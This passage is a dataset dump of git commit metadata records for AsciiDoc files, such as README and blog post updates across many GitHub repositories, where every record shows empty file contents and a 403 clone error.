term.\n","repos":"PigeonF\/.dotfiles","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PigeonF\/.dotfiles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b6b338036d34a20b7dcd702ba4fea432a8705746","subject":"updated Readme","message":"updated Readme\n","repos":"cthiebaud\/jaxrs-analyzer,cthiebaud\/jaxrs-analyzer,sdaschner\/jaxrs-analyzer","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cthiebaud\/jaxrs-analyzer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"334d8236b79fd9438518b1b8039be3f706b55224","subject":"Readme: add warning about AD and unencrypted connection","message":"Readme: add warning about AD and unencrypted connection\n","repos":"jirutka\/change-password,zhangwei0181\/ldap-passwd-webui","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jirutka\/change-password.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e94cda1d5fd07d171010618fcba718c6b3c9788e","subject":"switch to table for software versions","message":"switch to table for software versions\n","repos":"azuwis\/asciidoctor-fopdf,asciidoctor\/asciidoctor-fopub,getreu\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub,azuwis\/asciidoctor-fopdf,getreu\/asciidoctor-fopub,getreu\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/getreu\/asciidoctor-fopub.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f7606008dc06a63a374c3fe87c3381314dc6373","subject":"Update README","message":"Update README\n","repos":"pjanouch\/liberty,pjanouch\/liberty","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/liberty.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"1876cd61b9bec585e162afeff7bbdf08712723f4","subject":"Extend prerequisities section","message":"Extend prerequisities section\n\nFixes #50\n","repos":"redhat-openstack\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,markllama\/openshift-on-openstack,markllama\/openshift-on-openstack,BBVA\/openshift-on-openstack,BBVA\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-openstack\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b26030b1d6a6b77f3a66d03b04b4af9da6a032fb","subject":"Added good lookin' ASCII banner to root README","message":"Added good lookin' ASCII banner to root README\n","repos":"eset\/malware-research,eset\/malware-research,eset\/malware-research,eset\/malware-research","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eset\/malware-research.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"f7aeec81fcfcefe6f2750af39cb87497bcd65c9b","subject":"First dump to the README","message":"First dump to the README\n","repos":"insideqt\/awesome-qt","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/insideqt\/awesome-qt.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"78affc73107d7c396c6a03d04ca29135d0380bc0","subject":"Grammar and formatting fixes.","message":"Grammar and formatting fixes.\n","repos":"imosquera\/spinnaker,duftler\/spinnaker,skim1420\/spinnaker,spinnaker\/spinnaker,stitchfix\/spinnaker,ewiseblatt\/spinnaker,jtk54\/spinnaker,jtk54\/spinnaker,spinnaker\/spinnaker,tgracchus\/spinnaker,duftler\/spinnaker,stitchfix\/spinnaker,duftler\/spinnaker,tgracchus\/spinnaker,duftler\/spinnaker,stitchfix\/spinnaker,Roshan2017\/spinnaker,ewiseblatt\/spinnaker,imosquera\/spinnaker,ewiseblatt\/spinnaker,Roshan2017\/spinnaker,skim1420\/spinnaker,skim1420\/spinnaker,imosquera\/spinnaker,ewiseblatt\/spinnaker,skim1420\/spinnaker,spinnaker\/spinnaker,Roshan2017\/spinnaker,jtk54\/spinnaker,tgracchus\/spinnaker,spinnaker\/spinnaker","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/duftler\/spinnaker.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2a07f1a139ede34d7b103782032314def87cc7da","subject":"Deleted 2016-6-28-PHPER-authority-control.adoc","message":"Deleted 2016-6-28-PHPER-authority-control.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-28-PHPER-authority-control.adoc","new_file":"2016-6-28-PHPER-authority-control.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7647b5e0274d0ea4af1786f638b9447d87c2b5ff","subject":"Update 2015-06-26-Hello-World.adoc","message":"Update 2015-06-26-Hello-World.adoc","repos":"gerdbremer\/gerdbremer.github.io,gerdbremer\/gerdbremer.github.io,gerdbremer\/gerdbremer.github.io","old_file":"_posts\/2015-06-26-Hello-World.adoc","new_file":"_posts\/2015-06-26-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gerdbremer\/gerdbremer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63d79a4d2e40ba1652861b7eea668d84f3b1b275","subject":"snapshot","message":"snapshot\n","repos":"isaacs\/nshtools","old_file":"TODO-0.0.1.asciidoc","new_file":"TODO-0.0.1.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/isaacs\/nshtools.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"c1bdbaa032e4237b77359c6d3a77f4fdf3067d54","subject":"Update 2016-02-19-Star-Wars-Stage-Show-and-New-Fireworks-coming-to-Hollywood-Studios.adoc","message":"Update 2016-02-19-Star-Wars-Stage-Show-and-New-Fireworks-coming-to-Hollywood-Studios.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-19-Star-Wars-Stage-Show-and-New-Fireworks-coming-to-Hollywood-Studios.adoc","new_file":"_posts\/2016-02-19-Star-Wars-Stage-Show-and-New-Fireworks-coming-to-Hollywood-Studios.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a226760ac89ea6c8bf99fddce598e91e8fc0100","subject":"Update 2015-10-06-Scala-Basics.adoc","message":"Update 2015-10-06-Scala-Basics.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-06-Scala-Basics.adoc","new_file":"_posts\/2015-10-06-Scala-Basics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23166a625f1115dab2514e1587754578738d2db2","subject":"Update 2016-11-18-Sass-Awesome.adoc","message":"Update 2016-11-18-Sass-Awesome.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-18-Sass-Awesome.adoc","new_file":"_posts\/2016-11-18-Sass-Awesome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"153f91777f90e45f2683d574a376031bcb4dcb30","subject":"y2b create post The Black Friday Deals They Won't Show You...","message":"y2b create post The Black Friday Deals They Won't Show You...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-23-TheBlackFridayDealsTheyWontShowYou.adoc","new_file":"_posts\/2017-11-23-TheBlackFridayDealsTheyWontShowYou.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6fb5ad28d77d42cbc06b2f2e648f88826df25408","subject":"Add readme with badges","message":"Add readme with badges\n","repos":"jirutka\/ngx-oauth,jirutka\/ngx-oauth","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jirutka\/ngx-oauth.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c862f10202c25c2a3fce966112e3a8e550a39c9f","subject":"Oops, wrong quote","message":"Oops, wrong quote\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"40b0eb5cd0c58e3ab189c7c15b1e6417ba3d92bf","subject":"some explanation on plans\/not plans","message":"some explanation on plans\/not plans\n","repos":"jzacsh\/study,jzacsh\/study,jzacsh\/study","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jzacsh\/study.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"2d83d73b637e75a357b06aa2b60c3aae582628fe","subject":"feat(doc): move to asciidoc","message":"feat(doc): move to asciidoc\n","repos":"gravitee-io\/gravitee-policy-rest-to-soap","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-rest-to-soap.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"23337d923889de84be5932cad269ca12434da804","subject":"Added README.adoc","message":"Added README.adoc\n","repos":"jenkinsci\/sbuild-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenkinsci\/sbuild-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c1949c210c57f3252bab57e73f5826b4e8068dd6","subject":"Updated README screencast URL","message":"Updated README screencast URL\n\nNecessary to point to new URL which doesn't force the HTML format (will\nprovide more flexibility in the future).\n","repos":"bkuhlmann\/git-cop,bkuhlmann\/git-cop","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bkuhlmann\/git-cop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"51ed57eb83bef8a7a15be343a68b58360074ac64","subject":"update docs","message":"update docs\n","repos":"CommercialTribe\/psykube,CommercialTribe\/psykube,CommercialTribe\/psykube","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CommercialTribe\/psykube.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"01a69a08de77c9ea1dac59fae71a044a91467540","subject":"Minor readme fix","message":"Minor readme fix\n","repos":"joshuagn\/ANPR,justhackit\/javaanpr,joshuagn\/ANPR,justhackit\/javaanpr,adi9090\/javaanpr,adi9090\/javaanpr","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joshuagn\/ANPR.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6c874acde8d008ddb1eb7e2627222eae9d976ffb","subject":"Update 2015-02-20-Test.adoc","message":"Update 2015-02-20-Test.adoc","repos":"ron194\/ron194.github.io,ron194\/ron194.github.io,ron194\/ron194.github.io","old_file":"_posts\/2015-02-20-Test.adoc","new_file":"_posts\/2015-02-20-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ron194\/ron194.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"925eda03429fcba4e751cd89d6d604f1846a3596","subject":"y2b create post This Click Could Change The Rest Of Your Clicks...","message":"y2b create post This Click Could Change The Rest Of Your Clicks...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-09-This-Click-Could-Change-The-Rest-Of-Your-Clicks.adoc","new_file":"_posts\/2017-07-09-This-Click-Could-Change-The-Rest-Of-Your-Clicks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7c7a36ce7dd30f091eaed4cd5235ac74d3c4648","subject":"Update 2018-11-11-1.adoc","message":"Update 2018-11-11-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-11-1.adoc","new_file":"_posts\/2018-11-11-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51efa6ad6d57750f449e186b47f18bd41b0cfb78","subject":"y2b create post How To Draw In 3D","message":"y2b create post How To Draw In 3D","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-12-23-How-To-Draw-In-3D.adoc","new_file":"_posts\/2015-12-23-How-To-Draw-In-3D.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb2d7c5e94b66a313e046a56862b9d202435a532","subject":"Deleted 2016-12-2-three-dimensional-pen-of-dream.adoc","message":"Deleted 2016-12-2-three-dimensional-pen-of-dream.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-12-2-three-dimensional-pen-of-dream.adoc","new_file":"2016-12-2-three-dimensional-pen-of-dream.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d71bf89a93a995565c6570fe529cfa3f2817a49","subject":"Update 2015-07-14-Scheduling-deep-scrubs.adoc","message":"Update 2015-07-14-Scheduling-deep-scrubs.adoc","repos":"jbroszat\/jbroszat.github.io,jbroszat\/jbroszat.github.io,jbroszat\/jbroszat.github.io","old_file":"_posts\/2015-07-14-Scheduling-deep-scrubs.adoc","new_file":"_posts\/2015-07-14-Scheduling-deep-scrubs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbroszat\/jbroszat.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ee77a5c293b5da2d5919752a1f9f2b3e6713117","subject":"OGM-683 Minor typo","message":"OGM-683 Minor typo\n","repos":"DavideD\/hibernate-ogm-contrib,DavideD\/hibernate-ogm-cassandra,Sanne\/hibernate-ogm,mp911de\/hibernate-ogm,hibernate\/hibernate-ogm,tempbottle\/hibernate-ogm,hibernate\/hibernate-ogm,uugaa\/hibernate-ogm,mp911de\/hibernate-ogm,jhalliday\/hibernate-ogm,gunnarmorling\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,DavideD\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,uugaa\/hibernate-ogm,Sanne\/hibernate-ogm,hibernate\/hibernate-ogm,hibernate\/hibernate-ogm,Sanne\/hibernate-ogm,uugaa\/hibernate-ogm,DavideD\/hibernate-ogm,ZJaffee\/hibernate-ogm,ZJaffee\/hibernate-ogm,ZJaffee\/hibernate-ogm,tempbottle\/hibernate-ogm,DavideD\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,schernolyas\/hibernate-ogm,schernolyas\/hibernate-ogm,Sanne\/hibernate-ogm,schernolyas\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,jhalliday\/hibernate-ogm,gunnarmorling\/hibernate-ogm,tempbottle\/hibernate-ogm,mp911de\/hibernate-ogm,jhalliday\/hibernate-ogm,gunnarmorling\/hibernate-ogm,DavideD\/hibernate-ogm","old_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/mongodb.asciidoc","new_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/mongodb.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DavideD\/hibernate-ogm-contrib.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"2aedacf7a985058e761712ba3c8dccd1c0c4a6ed","subject":"OGM-555 Updating reference documentation","message":"OGM-555 Updating reference documentation\n","repos":"tempbottle\/hibernate-ogm,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm,uugaa\/hibernate-ogm,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,Sanne\/hibernate-ogm,gunnarmorling\/hibernate-ogm,uugaa\/hibernate-ogm,DavideD\/hibernate-ogm,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,DavideD\/hibernate-ogm-contrib,mp911de\/hibernate-ogm,gunnarmorling\/hibernate-ogm,uugaa\/hibernate-ogm,schernolyas\/hibernate-ogm,ZJaffee\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,DavideD\/hibernate-ogm-contrib,schernolyas\/hibernate-ogm,mp911de\/hibernate-ogm,gunnarmorling\/hibernate-ogm,tempbottle\/hibernate-ogm,schernolyas\/hibernate-ogm,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,Sanne\/hibernate-ogm,hibernate\/hibernate-ogm,tempbottle\/hibernate-ogm,ZJaffee\/hibernate-ogm,ZJaffee\/hibernate-ogm,DavideD\/hibernate-ogm,Sanne\/hibernate-ogm,mp911de\/hibernate-ogm,DavideD\/hibernate-ogm","old_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/mongodb.asciidoc","new_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/mongodb.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DavideD\/hibernate-ogm-contrib.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"3971892e466a61c453a1b46b345d0468fd30fc99","subject":"Fixed a technical error","message":"Fixed a technical error\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week03.asciidoc","new_file":"asciidoc\/week03.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"23aad71550cc339178f830702077abb2a296c772","subject":"2016-07-12-sister.adoc","message":"2016-07-12-sister.adoc\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-12-sister.adoc","new_file":"_posts\/2016-07-12-sister.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a3c22dc10c8147146841c32ae556230ccad66f74","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e5bfd11f639f04d7cc9bee25e2c282622689013","subject":"Update 2016-11-14-python.adoc","message":"Update 2016-11-14-python.adoc","repos":"zhuo2015\/zhuo2015.github.io,zhuo2015\/zhuo2015.github.io,zhuo2015\/zhuo2015.github.io,zhuo2015\/zhuo2015.github.io","old_file":"_posts\/2016-11-14-python.adoc","new_file":"_posts\/2016-11-14-python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zhuo2015\/zhuo2015.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3dbbfa861398eecbad83e6c50738f247dd9ad2e5","subject":"Update 2018-07-08-Gohttp.adoc","message":"Update 2018-07-08-Gohttp.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-08-Gohttp.adoc","new_file":"_posts\/2018-07-08-Gohttp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e669f31eef2ad21a0e291d192ac44f4c5ae2959f","subject":"Create 2016-07-16-Test-Post.adoc","message":"Create 2016-07-16-Test-Post.adoc","repos":"holtalanm\/holtalanm.github.io,holtalanm\/holtalanm.github.io,holtalanm\/holtalanm.github.io,holtalanm\/holtalanm.github.io","old_file":"_posts\/2016-07-16-Test-Post.adoc","new_file":"_posts\/2016-07-16-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/holtalanm\/holtalanm.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4820d2117d9c75fc023fd1a977f6207b348aa2b","subject":"Update 2017-07-19-Mentoring.adoc","message":"Update 2017-07-19-Mentoring.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-07-19-Mentoring.adoc","new_file":"_posts\/2017-07-19-Mentoring.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77b47f0eff1e366c9ef7ef1a201387720bc7c880","subject":"Update 2019-04-22-Cloud-Run.adoc","message":"Update 2019-04-22-Cloud-Run.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-04-22-Cloud-Run.adoc","new_file":"_posts\/2019-04-22-Cloud-Run.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62fbb80511c051c431044ef42609123e80893ccd","subject":"Update 2015-12-22-Flask-Form-and-Login.adoc","message":"Update 2015-12-22-Flask-Form-and-Login.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-12-22-Flask-Form-and-Login.adoc","new_file":"_posts\/2015-12-22-Flask-Form-and-Login.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c5ff29a2bfd2b1f751beb344dc6fc831d680dd1","subject":"create Korean translation for Administration.adoc","message":"create Korean translation for Administration.adoc\n","repos":"anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io","old_file":"docs\/Administration-ko.adoc","new_file":"docs\/Administration-ko.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/dev.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76ad9cebb0c60a160a726250b91e7cee6d2ad56e","subject":"Update 2017-11-06-api-blueprint.adoc","message":"Update 2017-11-06-api-blueprint.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-06-api-blueprint.adoc","new_file":"_posts\/2017-11-06-api-blueprint.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63e0140628f7bdfc7725d3def002d5855b5ab6bd","subject":"Add contributing document","message":"Add contributing document\n","repos":"dtrunk90\/spring-social-facebook,spring-projects\/spring-social-facebook,spring-projects\/spring-social-facebook,dtrunk90\/spring-social-facebook","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dtrunk90\/spring-social-facebook.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e7edb77caec8efec358bc0a88865f900e376bb43","subject":"SEC-2716: Fix doc spelling of AbstractPreAuthenticatedProcessingFilter","message":"SEC-2716: Fix doc spelling of AbstractPreAuthenticatedProcessingFilter\n","repos":"raindev\/spring-security,kazuki43zoo\/spring-security,ajdinhedzic\/spring-security,driftman\/spring-security,kazuki43zoo\/spring-security,spring-projects\/spring-security,fhanik\/spring-security,Peter32\/spring-security,pwheel\/spring-security,SanjayUser\/SpringSecurityPro,izeye\/spring-security,SanjayUser\/SpringSecurityPro,hippostar\/spring-security,caiwenshu\/spring-security,liuguohua\/spring-security,fhanik\/spring-security,diegofernandes\/spring-security,ractive\/spring-security,Xcorpio\/spring-security,yinhe402\/spring-security,raindev\/spring-security,mounb\/spring-security,mrkingybc\/spring-security,MatthiasWinzeler\/spring-security,Xcorpio\/spring-security,xingguang2013\/spring-security,eddumelendez\/spring-security,zgscwjm\/spring-security,jgrandja\/spring-security,zhaoqin102\/spring-security,zgscwjm\/spring-security,adairtaosy\/spring-security,Krasnyanskiy\/spring-security,diegofernandes\/spring-security,ajdinhedzic\/spring-security,mrkingybc\/spring-security,xingguang2013\/spring-security,Krasnyanskiy\/spring-security,ollie314\/spring-security,adairtaosy\/spring-security,cyratech\/spring-security,hippostar\/spring-security,pkdevbox\/spring-security,mdeinum\/spring-security,wkorando\/spring-security,vitorgv\/spring-security,wkorando\/spring-security,cyratech\/spring-security,eddumelendez\/spring-security,pkdevbox\/spring-security,MatthiasWinzeler\/spring-security,likaiwalkman\/spring-security,olezhuravlev\/spring-security,spring-projects\/spring-security,mparaz\/spring-security,jgrandja\/spring-security,mparaz\/spring-security,spring-projects\/spring-security,mdeinum\/spring-security,rwinch\/spring-security,eddumelendez\/spring-security,mparaz\/spring-security,pwheel\/spring-security,kazuki43zoo\/spring-security,likaiwalkman\/spring-security,thomasdarimont\/spring-security,forestqqqq\/spring-security,wkorando\/spring-security,kazuki43zoo\/spring-security,Krasnyanskiy\/spring-security,liuguohua\/spring-security,panchenko\/spring-security,zshift\/spring-security,caiwenshu\/spring-security,jmnarloch\/spring-security,fhanik\/spring-security,Peter32\/spring-security,djechelon\/spring-security,Peter32\/spring-security,jgrandja\/spring-security,liuguohua\/spring-security,chinazhaoht\/spring-security,adairtaosy\/spring-security,Krasnyanskiy\/spring-security,zhaoqin102\/spring-security,caiwenshu\/spring-security,thomasdarimont\/spring-security,Peter32\/spring-security,jmnarloch\/spring-security,driftman\/spring-security,spring-projects\/spring-security,pwheel\/spring-security,fol